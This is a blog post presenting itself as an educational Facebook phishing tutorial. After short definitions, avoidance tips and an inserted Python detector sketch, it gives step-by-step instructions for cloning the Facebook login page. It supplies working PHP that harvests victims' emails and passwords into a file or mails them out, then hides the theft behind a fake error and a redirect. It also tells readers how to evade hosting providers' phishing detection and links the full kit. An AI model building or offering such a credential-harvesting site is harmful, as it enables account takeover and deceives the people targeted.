Facebook Phishing Tutorial

Welcome to My First Blog Post!!

****** Education purpose only ******


Want to Prank on your Friends? or Get a Password of a Friend so Badly, Then This is Right Place for you,


Hopefully this blog will give you a clear understanding of what phishing is and how to avoid it.
Learn, avoid, BE SAFE.


Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and, indirectly, money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.

Spear phishing
Phishing attempts directed at specific individuals or companies have been termed spear phishing.

Clone phishing
Clone phishing is a type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email.

Social Engineering
Users can be incentivised to click on various kinds of unexpected content for a variety of technical and social reasons. For example, a malicious attachment might masquerade as a benign linked Google doc.
Alternatively users might be outraged by a fake news story, click a link and become infected.

There are many more phishing methods besides these.

Before you start doing phishing, you must know how to avoid being phished.



First of all, you should know about HTTP and HTTPS.
HTTPS is secure most of the time, but always check the URL even when the interface looks familiar. For example, this tutorial teaches you about creating a phishing site for Facebook: its URL is not the original, legitimate URL.

Keep an eye on the spam emails you get, and do not follow any link you don't trust. Sometimes they seem to come from legitimate email senders, so you must be very careful about giving away your passwords and other details to phishing sites.
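
The URL check described above can be automated. The following Python sketch is an added example, not code from the original post: it flags a page that carries Facebook branding or collects a password but is not served from, or does not post to, facebook.com. The single-domain allow-list, the finding names and the sample page are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

LEGIT_DOMAIN = "facebook.com"  # assumption: the only domain the real login lives on
# Constructed sample: a saved login page whose form posts to a local script.
SAMPLE_URL = "https://login-help.example/index.html"
SAMPLE_HTML = ('<title>Facebook - Log In or Sign Up</title><form action="sendEmail.php">'
               '<input name="email"><input type="password" name="pass"></form>')

def host_is_legit(url):
    """True only for https URLs on facebook.com or one of its subdomains."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    on_domain = host == LEGIT_DOMAIN or host.endswith("." + LEGIT_DOMAIN)
    return parts.scheme == "https" and on_domain

class LoginFormScanner(HTMLParser):
    """Collects the <title> and the action of each form that has a password field."""
    def __init__(self):
        super().__init__()
        self.title, self._tag = "", None
        self._action, self.password_actions = None, []
    def handle_starttag(self, tag, attrs):
        a, self._tag = dict(attrs), tag
        if tag == "form":
            self._action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._action is not None:  # only count fields inside a form
                self.password_actions.append(self._action)
    def handle_endtag(self, tag):
        self._tag = None
        if tag == "form":
            self._action = None
    def handle_data(self, data):
        if self._tag == "title":
            self.title += data

def assess(page_url, html):
    """Return findings for one fetched page; an empty list means none."""
    s = LoginFormScanner()
    s.feed(html)
    findings = []
    if "facebook" in s.title.lower() and not host_is_legit(page_url):
        findings.append("brand-in-title-on-foreign-host")
    for action in s.password_actions:
        # Relative actions resolve against the page URL, so a local script is off-brand.
        if not host_is_legit(urljoin(page_url, action)):
            findings.append("password-posted-off-brand")
    return findings
```

The suffix test compares against ".facebook.com" with the leading dot, so a look-alike host such as facebook.com.login-help.example is rejected.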

Okay Now How to Make a Phishing Site..

How to do phishing


Step 01.

Go to Facebook home page.

Right click -> save as ( save as type should be "Web Page, Complete ) -> save


Step 02.

Let's edit "Facebook - Log In or Sign Up.html" file.
 Search "action="


Replace the "https://www.facebook.com/login.php?login_attempt=1&lwv=110" with
sendEmail.php ( You can Use 'anyname.php')



there are some ajax codes inside this html file that communicate with the original facebook server. 
That Recognize the fake page in a Second it prevents us from hosting this phishing page in web hosting servers. So you have to make sure that you delete all ajax scripts in the .html file

You will find the ajax removed html file and all files at end of the tutorial here

Save the html Doc.

Step 03.

Open a Notepad and type The Code and save as ".php" file




_-------------------------------------------------------------------------------------------------------------------------_
_-------------------------------------------------------------------------------------------------------------------------_


<?php
$email = $_POST['email'];
$password = $_POST['pass'];
$message= $email."  ".$password;

// Send the email which contains credentials. This method is better when free hosting
//mail('xxxxxxxxx@gmail.com', 'My Subject', $message);
// when running locally writing to a file is better for checking purposes


$myfile = fopen("newfile.txt", "a") or die("Unable to open file!");
fwrite($myfile, $message);
fclose($myfile);



// This Message Will Give Realistic error and returns to a original facebook login showing it as technical issue

echo 'Internet connection is slow ... ';

//redirecting user to a closed facebook Original login location

header('Refresh: 2; URL=https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2Fgroups%2Fonlinehelpz%2F');
?>

_-------------------------------------------------------------------------------------------------------------------------_
_-------------------------------------------------------------------------------------------------------------------------_

From this Code You can Send the Victims Details Directly to your email, Some free web hosting site allow email services with those you Can Send a Email too...
Examine the Code for that..

For Now You Dont Need to worry about those Just Copy and Paste the Code as PHP File


 $myfile = fopen("newfile.txt", "a") or die("Unable to open file!");

This is where we will store our Data
so Create a nother .txt file named "newfile.txt"

You Can Find All Files from Here
https://github.com/PasanRS/Phishing


Step 04.

Rename "Facebook_Log_In_or_Sign_Up.html" to "Index.html"
keep all Files in one Folder

Index.html
sendEmail.php
newfile.txt
Facebook_Log_In_or_Sign_Up_Files                         // (Folder)


Step 05.


Now Create a Account in Free Hosting Site Like "www.000webhost.com"

  FileManager-> Upload files now ->

Upload all the Files to there






Thats it... Now your Phishing Site is Created..












NOTE: HOSTING SITES CAN DETECT PHISHING SITES BY AJAXs IN THE WEB PAGE MAKE SURE TO REMOVE ALL AJAXs IN INDEX PAGE OR ELSE YOUR HOSTING ACCOUNT WILL GET SUSPENDED IMMEDIATELY 



